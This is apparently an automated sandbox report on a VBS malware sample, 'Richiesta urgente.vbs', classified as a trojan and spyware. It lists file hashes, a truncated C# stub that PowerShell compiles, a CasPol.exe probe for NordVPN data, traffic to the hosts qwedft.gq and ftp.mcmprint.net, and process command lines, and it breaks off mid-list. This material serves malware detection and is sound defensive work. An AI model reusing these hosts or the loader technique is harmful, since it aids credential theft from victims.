                  http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 00000003.00000002.727863466.0000000004761000.00000004.00000800.00020000.00000000.sdmpfalse
                    high
                    https://github.com/Pester/Pesterpowershell.exe, 00000003.00000002.732273306.000000000489F000.00000004.00000800.00020000.00000000.sdmpfalse
                      high
                      • No. of IPs < 25%
                      • 25% < No. of IPs < 50%
                      • 50% < No. of IPs < 75%
                      • 75% < No. of IPs
                      IPDomainCountryFlagASNASN NameMalicious
                      162.240.62.179
                      qwedft.gqUnited States
                      46606UNIFIEDLAYER-AS-1USfalse
                      185.31.121.136
                      ftp.mcmprint.netBulgaria
                      199364RAX-ASBGfalse
                      Joe Sandbox Version:36.0.0 Rainbow Opal
                      Analysis ID:755115
                      Start date and time:2022-11-28 11:04:10 +01:00
                      Joe Sandbox Product:CloudBasic
                      Overall analysis duration:0h 10m 36s
                      Hypervisor based Inspection enabled:false
                      Report type:light
                      Sample file name:Richiesta urgente.vbs
                      Cookbook file name:default.jbs
                      Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 104, IE 11, Adobe Reader DC 19, Java 8 Update 211
                      Number of analysed new started processes analysed:12
                      Number of new started drivers analysed:0
                      Number of existing processes analysed:0
                      Number of existing drivers analysed:0
                      Number of injected processes analysed:0
                      Technologies:
                      • HCA enabled
                      • EGA enabled
                      • HDC enabled
                      • AMSI enabled
                      Analysis Mode:default
                      Analysis stop reason:Timeout
                      Detection:MAL
                      Classification:mal100.troj.spyw.expl.evad.winVBS@13/10@2/2
                      EGA Information:
                      • Successful, ratio: 50%
                      HDC Information:Failed
                      HCA Information:
                      • Successful, ratio: 99%
                      • Number of executed functions: 0
                      • Number of non-executed functions: 0
                      Cookbook Comments:
                      • Found application associated with file extension: .vbs
                      • Override analysis time to 240s for JS/VBS files not yet terminated
                      • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, conhost.exe, WmiPrvSE.exe
                      • TCP Packets have been reduced to 100
                      • Excluded domains from analysis (whitelisted): client.wns.windows.com, tile-service.weather.microsoft.com, ctldl.windowsupdate.com
                      • Execution Graph export aborted for target powershell.exe, PID 5840 because it is empty
                      • Not all processes where analyzed, report is missing behavior information
                      • Report size exceeded maximum capacity and may have missing behavior information.
                      • Report size getting too big, too many NtOpenKeyEx calls found.
                      • Report size getting too big, too many NtProtectVirtualMemory calls found.
                      • Report size getting too big, too many NtQueryValueKey calls found.
                      TimeTypeDescription
                      11:06:40API Interceptor39x Sleep call for process: powershell.exe modified
                      11:08:20API Interceptor396x Sleep call for process: CasPol.exe modified
                      No context
                      No context
                      No context
                      No context
                      No context
                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                      File Type:data
                      Category:modified
                      Size (bytes):8003
                      Entropy (8bit):4.839308921501875
                      Encrypted:false
                      SSDEEP:192:yxoe5oVsm5emdVVFn3eGOVpN6K3bkkjo59gkjDt4iWN3yBGHh9smidcU6CXpOTik:DBVoGIpN6KQkj2Wkjh4iUx0mib4J
                      MD5:937C6E940577634844311E349BD4614D
                      SHA1:379440E933201CD3E6E6BF9B0E61B7663693195F
                      SHA-256:30DC628AB2979D2CF0D281E998077E5721C68B9BBA61610039E11FDC438B993C
                      SHA-512:6B37FE533991631C8290A0E9CC0B4F11A79828616BEF0233B4C57EC7C9DCBFC274FB7E50FC920C4312C93E74CE621B6779F10E4016E9FD794961696074BDFBFA
                      Malicious:false
                      Preview:PSMODULECACHE......<.e...Y...C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command........Update-ModuleManifest........Find-DscResource........Save-Module........Save-Script........upmo........Uninstall-Script........Get-InstalledScript........Update-Module........Register-PSRepository........Find-Script........Unregister-PSRepository........pumo........Test-ScriptFileInfo........Update-ScriptFileInfo........Set-PSRepository........Get-PSRepository........Get-InstalledModule........Find-Module........Find-RoleCapability........Publish-Script.........<.e...T...C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PSModule.psm1*.......Install-Script........Save-Module........Publish-Module........Find-Module........Download-Package........Update-Module....
                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                      File Type:Unicode text, UTF-8 (with BOM) text, with very long lines (1303), with no line terminators
                      Category:dropped
                      Size (bytes):1306
                      Entropy (8bit):4.96457254634036
                      Encrypted:false
                      SSDEEP:24:JVSVlyvpuyG8wEyQhnPd3ywbfSoGGPc+c6haG+fgnH:JVOlu4ywE3hPd39+oGGPc+c6haG+onH
                      MD5:63200708319CC8C999DE12FF4CD3FA3E
                      SHA1:36DDB69CCD4FF5D22013234C44EACD3EE4D04C78
                      SHA-256:4D4CE4254F2AB3D55A232F63A523A46D9835F094A2D0211E748CA449688D03EA
                      SHA-512:A9F1350B335519CD01449B25B2FF4E0C62D746EA221BD6939522468772A4FBA88CAA2667088C19C376A6B1969FE4576C37A356A97CAFF30EE889BB039733E4EB
                      Malicious:false
                      Preview:.using System;using System.Runtime.InteropServices;public static class Reabridged1 {[DllImport("winmm.dll")]public static extern int midiOutOpen(int kvali,int Kon,int Ringed,int Unwo,int Ude);[DllImport("kernel32")]public static extern int LocalShrink(int scorpi,int Nsketn);[DllImport("kernel32")]public static extern int SetCommState(int Kofta,int Storry);[DllImport("kernel32")]public static extern int HeapCreate(int Necrop,int Flsk,int Grup);[DllImport("kernel32")]public static extern int VirtualAlloc(int v1,int v2,int v3,int v4);[DllImport("imm32.dll")]public static extern int ImmSetStatusWindowPos(int Pala,int Raz);[DllImport("ADVAPI32.DLL")]public static extern int InitializeAcl(int Col,int Una,int Flopp201);[DllImport("gdi32")]public static extern int SetWindowExtEx(int Duc,int Henbl,int Sideta,int Appas);[DllImport("gdi32")]public static extern int UnrealizeObject(int Howean);[DllImport("user32")]public static extern int GetKeyState(int For);[DllImport("gdi32")]public static ex
                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                      File Type:Unicode text, UTF-8 (with BOM) text, with very long lines (368), with no line terminators
                      Category:dropped
                      Size (bytes):371
                      Entropy (8bit):5.2724394416051705
                      Encrypted:false
                      SSDEEP:6:pAu+H2LvkuqJDdqxLTKbDdqB/6K2923fuT2Gzxs7+AEszI923fuT2hxn:p37Lvkmb6Kz2T2GWZE22T2b
                      MD5:D6A1C20A450BBBE5A57366705B164C64
                      SHA1:B6B4FBA84E9EA8BE6ACBCF8B0C31B0CF80828165
                      SHA-256:631A7CB72C20067D016139BA01FFFEA4F5A28C0DD5EDB5C805275183B8BE39D9
                      SHA-512:EF2A70EAE2AC62B008EC585149DAB2B850FE5667B0265F065F5002B736CEA1479D68EEC6AD56219385C219A80B5BDB0DE2996B742725822C235E83DC9CF250C6
                      Malicious:true
                      Preview:./t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /out:"C:\Users\user\AppData\Local\Temp\2vgl23kr\2vgl23kr.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\2vgl23kr\2vgl23kr.0.cs"
                      Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
                      File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                      Category:dropped
                      Size (bytes):4096
                      Entropy (8bit):3.2933249715555086
                      Encrypted:false
                      SSDEEP:48:6jkQn/oLUdmWi8PiNnhucpm77Fvlb41ulgma3blq:puo47rdqm7Hbr3K
                      MD5:3DE7A3FE4B71E0AE06B6C4D8778C24FA
                      SHA1:61F551C09BEFF6E8BB994E6B0E2D6B13FA34B12F
                      SHA-256:E1B6C6B65C4313E2DD89AF4F6C619FA059EC1268CF4AE0EB661E7690564B9DC4
                      SHA-512:82A552524A26FA65E6340A84AE828C60C7841AE9585D8059163FEE29CF652C22202E05DDCF1110C468949D710E07282E5C13DB08FD01F26FA09C81C737F56D00
                      Malicious:false
                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......c...........!.................'... ...@....... ....................................@..................................&..S....@.......................`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................&......H.......P ..h...........................................................BSJB............v4.0.30319......l.......#~..P.......#Strings............#US.........#GUID.......l...#Blob...........G.........%3....................$.......................................3.,...............H.).................................... :............ F............ R............ _............ j. .......... w............ ............. .. .......... ..(.......... ..(.......... ............. ........
                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                      File Type:Unicode text, UTF-8 (with BOM) text, with very long lines (445), with CRLF, CR line terminators
                      Category:modified
                      Size (bytes):866
                      Entropy (8bit):5.323647555720293
                      Encrypted:false
                      SSDEEP:24:Aqd3ka6Kz02XE202aKaM5DqBVKVrdFAMBJTH:Aika6a0+E20RKxDcVKdBJj
                      MD5:596472A8FA705DBA98A38E713E5C6AC5
                      SHA1:49A69DDD7C70238FE1B0A62636072830ECD2EB07
                      SHA-256:0047CDAF9FB443408ACDF55FF6D9F4409C7D5B554AFD980357760CB2DF49B8E7
                      SHA-512:759546A855353402CF43524E95BFE599D9D2C8F2C28B02E646C71873618833523EBC9C766083E77D55F67F1B1E6C63F3BED3AF1805D83DA5720A5B64CDFECD2E
                      Malicious:false
                      Preview:.C:\Windows\system32> "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /out:"C:\Users\user\AppData\Local\Temp\2vgl23kr\2vgl23kr.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\2vgl23kr\2vgl23kr.0.cs"......Microsoft (R) Visual C# Compiler version 4.7.3056.0...for C# 5..Copyright (C) Microsoft Corporation. All rights reserved.......This compiler is provided as part of the Microsoft (R) .NET Framework, but only supports language versions up to C# 5, which is no longer the latest version. For compilers that support newer versions of the C# programming language, see http://go.microsoft.com/fwlink/?LinkID=533240....
                      Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
                      File Type:MSVC .res
                      Category:dropped
                      Size (bytes):652
                      Entropy (8bit):3.1110642504291888
                      Encrypted:false
                      SSDEEP:12:DXt4Ii3ntuAHia5YA49aUGiqMZAiN5gry07irak7YnqqH7iEPN5Dlq5J:+RI+ycuZhNgmakSb3PNnqX
                      MD5:5484828547E61E5ED20C9C7AA3F8A993
                      SHA1:4C45EF4BA03B144EEDBEC4955A1EE1B4599CCD2C
                      SHA-256:255D05714ECF0937F6E0A8375F0856FA5B815A4BB59F1E64867ED0B2BD0DA42A
                      SHA-512:A792290BDAEEDAD3571F14A034B4032DE61D97756FEB88B568B39F8908689E4CBA815942B0DFD9D72D9B849BD63A76EA2005C88EA351AA89A472DA5FF3E01B07
                      Malicious:false
                      Preview:.... ...........................L...<...............0...........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...2.v.g.l.2.3.k.r...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e...2.v.g.l.2.3.k.r...d.l.l.....4.....P.r.o.d.u.c.t.V.e.r.s.i.o.n...0...0...0...0...8.....A.s.s.e.m.b.l.y. .V.e.r.s.i.o.n...0...0...0...0...
                      Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
                      File Type:Intel 80386 COFF object file, not stripped, 3 sections, symbol offset=0x48a, 9 symbols, created Mon Nov 28 19:06:44 2022, 1st section name ".debug$S"
                      Category:dropped
                      Size (bytes):1328
                      Entropy (8bit):3.995196855324645
                      Encrypted:false
                      SSDEEP:24:HOe9E26ZgcH9hKPfwI+ycuZhNgmakSb3PNnq9qd:IdrKPo1ulgma3blq9K
                      MD5:9EBABE1B4A1E0150B53DC653F83DC046
                      SHA1:6F09AAF253D410C604F5DDE80FFE7FD54D0D88BF
                      SHA-256:0E57FA5A4FE501D3B91C70B6A2CF9CFA828F103FB8C270DDE6CE13B58EE755AB
                      SHA-512:D07C90286AF63EAE69BB3E28E2272D18B409A3BE67369093CFE0DBEAC3BF5D06F4D1EC30B627344638053EA41B47A105F374E6FD7F46039D2A6E64082221B9F7
                      Malicious:false
                      Preview:L......c.............debug$S........L...................@..B.rsrc$01........X.......0...........@..@.rsrc$02........P...:...............@..@........T....c:\Users\user\AppData\Local\Temp\2vgl23kr\CSC2C40FF502EE54A39B5D71CE974C4B10.TMP...............T...G..^...z..............5.......C:\Users\user\AppData\Local\Temp\RESA66C.tmp.-.<...................'...Microsoft (R) CVTRES.Y.=..cwd.C:\Windows\system32.exe.C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe.................................................0.......................H.......L...........H.........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...2.v.g.l.2.3.k.r...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....O.r.i.g.i.n.
                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                      File Type:very short file (no magic)
                      Category:dropped
                      Size (bytes):1
                      Entropy (8bit):0.0
                      Encrypted:false
                      SSDEEP:3:U:U
                      MD5:C4CA4238A0B923820DCC509A6F75849B
                      SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                      SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                      SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                      Malicious:false
                      Preview:1
                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                      File Type:very short file (no magic)
                      Category:dropped
                      Size (bytes):1
                      Entropy (8bit):0.0
                      Encrypted:false
                      SSDEEP:3:U:U
                      MD5:C4CA4238A0B923820DCC509A6F75849B
                      SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                      SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                      SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                      Malicious:false
                      Preview:1
                      Process:C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe
                      File Type:ASCII text, with CRLF line terminators
                      Category:dropped
                      Size (bytes):30
                      Entropy (8bit):3.964735178725505
                      Encrypted:false
                      SSDEEP:3:IBVFBWAGRHneyy:ITqAGRHner
                      MD5:9F754B47B351EF0FC32527B541420595
                      SHA1:006C66220B33E98C725B73495FE97B3291CE14D9
                      SHA-256:0219D77348D2F0510025E188D4EA84A8E73F856DEB5E0878D673079D05840591
                      SHA-512:C6996379BCB774CE27EEEC0F173CBACC70CA02F3A773DD879E3A42DA554535A94A9C13308D14E873C71A338105804AFFF32302558111EE880BA0C41747A08532
                      Malicious:false
                      Preview:NordVPN directory not found!..
                      File type:ASCII text, with CRLF line terminators
                      Entropy (8bit):5.846060220348072
                      TrID:
                        File name:Richiesta urgente.vbs
                        File size:356020
                        MD5:de0edf01710a38b1e96688ae2f712ebb
                        SHA1:6791a70cf79c415ba109e86734bcfd1b4930ec31
                        SHA256:20796159ce1191fe88603ee4be1855bca614bcb29161d149a6990b48589d88c5
                        SHA512:8456bd4c7106a8231f07407fa692520436a9be635fe6245e20d0d61efe11bd2664f758dc7a2f30eb7fd0839e90b854972d5c6d31d6b7e800d78bbf5bb4d970b9
                        SSDEEP:6144:JmYNxYtoG4TDkYeZrZZL1HQTazh6VQIGoeJTaBrSlWYNemg/j4XO9Zob4HZIKK:8JaVerZzwTi4VyoKKrSlZN4/7F6KK
                        TLSH:3874BFA0DB1D2B040B7F175A9C42DB49E4EA772A62121C7CADA9078E3D32238D73F715
                        File Content Preview:..'zephyrian stratagem Wigwamerne177 Alcoholisable53 PROMISINGLY ..'ACETAMID GRANULARITY Mandatet torteaus TANGFORLSENDES ALTOCUMULUS Jambarts ..'Gein187 garglers Goslet Afblsnings ENEHERREDMMERS UNDSEELIGHED TUSSENS Mrtelvrkets139 HOG besvrger stellularl
                        Icon Hash:e8d69ece869a9ec4
                        TimestampSource PortDest PortSource IPDest IP
                        Nov 28, 2022 11:08:13.349935055 CET4970980192.168.2.5162.240.62.179
                        Nov 28, 2022 11:08:13.516900063 CET8049709162.240.62.179192.168.2.5
                        Nov 28, 2022 11:08:13.517033100 CET4970980192.168.2.5162.240.62.179
                        Nov 28, 2022 11:08:13.517817020 CET4970980192.168.2.5162.240.62.179
                        Nov 28, 2022 11:08:13.684075117 CET8049709162.240.62.179192.168.2.5
                        Nov 28, 2022 11:08:13.686036110 CET8049709162.240.62.179192.168.2.5
                        Nov 28, 2022 11:08:13.686043978 CET8049709162.240.62.179192.168.2.5
                        Nov 28, 2022 11:08:13.686065912 CET8049709162.240.62.179192.168.2.5
                        Nov 28, 2022 11:08:13.686080933 CET8049709162.240.62.179192.168.2.5
                        Nov 28, 2022 11:08:13.686104059 CET8049709162.240.62.179192.168.2.5
                        Nov 28, 2022 11:08:13.686116934 CET8049709162.240.62.179192.168.2.5
                        Nov 28, 2022 11:08:13.686135054 CET8049709162.240.62.179192.168.2.5
                        Nov 28, 2022 11:08:13.686153889 CET8049709162.240.62.179192.168.2.5
                        Nov 28, 2022 11:08:13.686171055 CET8049709162.240.62.179192.168.2.5
                        Nov 28, 2022 11:08:13.686188936 CET8049709162.240.62.179192.168.2.5
                        Nov 28, 2022 11:08:13.686192036 CET4970980192.168.2.5162.240.62.179
                        Nov 28, 2022 11:08:13.686263084 CET4970980192.168.2.5162.240.62.179
                        Nov 28, 2022 11:08:13.852817059 CET8049709162.240.62.179192.168.2.5
                        Nov 28, 2022 11:08:13.852993011 CET4970980192.168.2.5162.240.62.179
                        Nov 28, 2022 11:08:13.853167057 CET8049709162.240.62.179192.168.2.5
                        Nov 28, 2022 11:08:13.853199959 CET8049709162.240.62.179192.168.2.5
                        Nov 28, 2022 11:08:13.853219032 CET8049709162.240.62.179192.168.2.5
                        Nov 28, 2022 11:08:13.853236914 CET8049709162.240.62.179192.168.2.5
                        Nov 28, 2022 11:08:13.853250980 CET4970980192.168.2.5162.240.62.179
                        Nov 28, 2022 11:08:13.853269100 CET8049709162.240.62.179192.168.2.5
                        Nov 28, 2022 11:08:13.853288889 CET4970980192.168.2.5162.240.62.179
                        Nov 28, 2022 11:08:13.853297949 CET8049709162.240.62.179192.168.2.5
                        Nov 28, 2022 11:08:13.853317022 CET8049709162.240.62.179192.168.2.5
                        Nov 28, 2022 11:08:13.853334904 CET8049709162.240.62.179192.168.2.5
                        Nov 28, 2022 11:08:13.853344917 CET4970980192.168.2.5162.240.62.179
                        Nov 28, 2022 11:08:13.853362083 CET8049709162.240.62.179192.168.2.5
                        Nov 28, 2022 11:08:13.853373051 CET4970980192.168.2.5162.240.62.179
                        Nov 28, 2022 11:08:13.853391886 CET8049709162.240.62.179192.168.2.5
                        Nov 28, 2022 11:08:13.853411913 CET8049709162.240.62.179192.168.2.5
                        Nov 28, 2022 11:08:13.853421926 CET4970980192.168.2.5162.240.62.179
                        Nov 28, 2022 11:08:13.853439093 CET8049709162.240.62.179192.168.2.5
                        Nov 28, 2022 11:08:13.853450060 CET4970980192.168.2.5162.240.62.179
                        Nov 28, 2022 11:08:13.853466988 CET8049709162.240.62.179192.168.2.5
                        Nov 28, 2022 11:08:13.853487968 CET8049709162.240.62.179192.168.2.5
                        Nov 28, 2022 11:08:13.853494883 CET4970980192.168.2.5162.240.62.179
                        Nov 28, 2022 11:08:13.853511095 CET8049709162.240.62.179192.168.2.5
                        Nov 28, 2022 11:08:13.853522062 CET4970980192.168.2.5162.240.62.179
                        Nov 28, 2022 11:08:13.853539944 CET8049709162.240.62.179192.168.2.5
                        Nov 28, 2022 11:08:13.853560925 CET8049709162.240.62.179192.168.2.5
                        Nov 28, 2022 11:08:13.853566885 CET4970980192.168.2.5162.240.62.179
                        Nov 28, 2022 11:08:13.853585005 CET8049709162.240.62.179192.168.2.5
                        Nov 28, 2022 11:08:13.853593111 CET4970980192.168.2.5162.240.62.179
                        Nov 28, 2022 11:08:13.853610992 CET8049709162.240.62.179192.168.2.5
                        Nov 28, 2022 11:08:13.853629112 CET4970980192.168.2.5162.240.62.179
                        Nov 28, 2022 11:08:13.853661060 CET4970980192.168.2.5162.240.62.179
                        Nov 28, 2022 11:08:14.019418001 CET8049709162.240.62.179192.168.2.5
                        Nov 28, 2022 11:08:14.019454956 CET8049709162.240.62.179192.168.2.5
                        Nov 28, 2022 11:08:14.019522905 CET4970980192.168.2.5162.240.62.179
                        Nov 28, 2022 11:08:14.019576073 CET4970980192.168.2.5162.240.62.179
                        Nov 28, 2022 11:08:14.019954920 CET8049709162.240.62.179192.168.2.5
                        Nov 28, 2022 11:08:14.019995928 CET8049709162.240.62.179192.168.2.5
                        Nov 28, 2022 11:08:14.020021915 CET8049709162.240.62.179192.168.2.5
                        Nov 28, 2022 11:08:14.020050049 CET8049709162.240.62.179192.168.2.5
                        Nov 28, 2022 11:08:14.020071983 CET8049709162.240.62.179192.168.2.5
                        Nov 28, 2022 11:08:14.020111084 CET8049709162.240.62.179192.168.2.5
                        Nov 28, 2022 11:08:14.020131111 CET8049709162.240.62.179192.168.2.5
                        Nov 28, 2022 11:08:14.020137072 CET4970980192.168.2.5162.240.62.179
                        Nov 28, 2022 11:08:14.020159960 CET8049709162.240.62.179192.168.2.5
                        Nov 28, 2022 11:08:14.020188093 CET4970980192.168.2.5162.240.62.179
                        Nov 28, 2022 11:08:14.020189047 CET8049709162.240.62.179192.168.2.5
                        Nov 28, 2022 11:08:14.020210028 CET4970980192.168.2.5162.240.62.179
                        Nov 28, 2022 11:08:14.020220995 CET8049709162.240.62.179192.168.2.5
                        Nov 28, 2022 11:08:14.020241022 CET4970980192.168.2.5162.240.62.179
                        Nov 28, 2022 11:08:14.020246983 CET8049709162.240.62.179192.168.2.5
                        Nov 28, 2022 11:08:14.020265102 CET8049709162.240.62.179192.168.2.5
                        Nov 28, 2022 11:08:14.020273924 CET4970980192.168.2.5162.240.62.179
                        Nov 28, 2022 11:08:14.020283937 CET8049709162.240.62.179192.168.2.5
                        Nov 28, 2022 11:08:14.020302057 CET8049709162.240.62.179192.168.2.5
                        Nov 28, 2022 11:08:14.020315886 CET4970980192.168.2.5162.240.62.179
                        Nov 28, 2022 11:08:14.020319939 CET8049709162.240.62.179192.168.2.5
                        Nov 28, 2022 11:08:14.020340919 CET8049709162.240.62.179192.168.2.5
                        Nov 28, 2022 11:08:14.020358086 CET8049709162.240.62.179192.168.2.5
                        Nov 28, 2022 11:08:14.020369053 CET4970980192.168.2.5162.240.62.179
                        Nov 28, 2022 11:08:14.020375013 CET8049709162.240.62.179192.168.2.5
                        Nov 28, 2022 11:08:14.020394087 CET8049709162.240.62.179192.168.2.5
                        Nov 28, 2022 11:08:14.020411015 CET8049709162.240.62.179192.168.2.5
                        Nov 28, 2022 11:08:14.020417929 CET4970980192.168.2.5162.240.62.179
                        Nov 28, 2022 11:08:14.020428896 CET8049709162.240.62.179192.168.2.5
                        Nov 28, 2022 11:08:14.020441055 CET4970980192.168.2.5162.240.62.179
                        Nov 28, 2022 11:08:14.020447969 CET8049709162.240.62.179192.168.2.5
                        Nov 28, 2022 11:08:14.020463943 CET4970980192.168.2.5162.240.62.179
                        Nov 28, 2022 11:08:14.020467043 CET8049709162.240.62.179192.168.2.5
                        Nov 28, 2022 11:08:14.020486116 CET8049709162.240.62.179192.168.2.5
                        Nov 28, 2022 11:08:14.020503044 CET8049709162.240.62.179192.168.2.5
                        Nov 28, 2022 11:08:14.020503044 CET4970980192.168.2.5162.240.62.179
                        Nov 28, 2022 11:08:14.020520926 CET8049709162.240.62.179192.168.2.5
                        Nov 28, 2022 11:08:14.020539999 CET8049709162.240.62.179192.168.2.5
                        Nov 28, 2022 11:08:14.020556927 CET8049709162.240.62.179192.168.2.5
                        Nov 28, 2022 11:08:14.020558119 CET4970980192.168.2.5162.240.62.179
                        Nov 28, 2022 11:08:14.020569086 CET4970980192.168.2.5162.240.62.179
                        Nov 28, 2022 11:08:14.020577908 CET8049709162.240.62.179192.168.2.5
                        Nov 28, 2022 11:08:14.020591021 CET8049709162.240.62.179192.168.2.5
                        Nov 28, 2022 11:08:14.020596981 CET4970980192.168.2.5162.240.62.179
                        Nov 28, 2022 11:08:14.020610094 CET8049709162.240.62.179192.168.2.5
                        Nov 28, 2022 11:08:14.020627975 CET8049709162.240.62.179192.168.2.5
                        TimestampSource PortDest PortSource IPDest IP
                        Nov 28, 2022 11:08:12.997488976 CET5503953192.168.2.58.8.8.8
                        Nov 28, 2022 11:08:13.331123114 CET53550398.8.8.8192.168.2.5
                        Nov 28, 2022 11:08:34.404402018 CET5922053192.168.2.58.8.8.8
                        Nov 28, 2022 11:08:34.511842966 CET53592208.8.8.8192.168.2.5
                        TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                        Nov 28, 2022 11:08:12.997488976 CET192.168.2.58.8.8.80x5a31Standard query (0)qwedft.gqA (IP address)IN (0x0001)false
                        Nov 28, 2022 11:08:34.404402018 CET192.168.2.58.8.8.80xcfa6Standard query (0)ftp.mcmprint.netA (IP address)IN (0x0001)false
                        TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                        Nov 28, 2022 11:08:13.331123114 CET8.8.8.8192.168.2.50x5a31No error (0)qwedft.gq162.240.62.179A (IP address)IN (0x0001)false
                        Nov 28, 2022 11:08:34.511842966 CET8.8.8.8192.168.2.50xcfa6No error (0)ftp.mcmprint.net185.31.121.136A (IP address)IN (0x0001)false
                        • qwedft.gq
                        TimestampSource PortDest PortSource IPDest IPCommands
                        Nov 28, 2022 11:08:34.638608932 CET2149711185.31.121.136192.168.2.5220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------
                        220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 1 of 50 allowed.
                        220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 1 of 50 allowed.220-Local time is now 12:08. Server port: 21.
                        220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 1 of 50 allowed.220-Local time is now 12:08. Server port: 21.220-This is a private system - No anonymous login
                        220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 1 of 50 allowed.220-Local time is now 12:08. Server port: 21.220-This is a private system - No anonymous login220-IPv6 connections are also welcome on this server.
                        220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 1 of 50 allowed.220-Local time is now 12:08. Server port: 21.220-This is a private system - No anonymous login220-IPv6 connections are also welcome on this server.220 You will be disconnected after 15 minutes of inactivity.
                        Nov 28, 2022 11:08:34.643579960 CET2149711185.31.121.136192.168.2.5220 Logout.

                        Click to jump to process

                        Target ID:0
                        Start time:11:05:04
                        Start date:28/11/2022
                        Path:C:\Windows\System32\wscript.exe
                        Wow64 process (32bit):false
                        Commandline:C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Richiesta urgente.vbs"
                        Imagebase:0x7ff707f10000
                        File size:163840 bytes
                        MD5 hash:9A68ADD12EB50DDE7586782C3EB9FF9C
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Reputation:high

                        Target ID:1
                        Start time:11:05:06
                        Start date:28/11/2022
                        Path:C:\Windows\System32\cmd.exe
                        Wow64 process (32bit):false
                        Commandline:CMD.EXE /c echo C:\Windows
                        Imagebase:0x7ff627730000
                        File size:273920 bytes
                        MD5 hash:4E2ACF4F8A396486AB4268C94A6A245F
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Reputation:high

                        Target ID:2
                        Start time:11:05:06
                        Start date:28/11/2022
                        Path:C:\Windows\System32\conhost.exe
                        Wow64 process (32bit):false
                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Imagebase:0x7ff7fcd70000
                        File size:625664 bytes
                        MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Reputation:high

                        Target ID:3
                        Start time:11:05:36
                        Start date:28/11/2022
                        Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                        Wow64 process (32bit):true
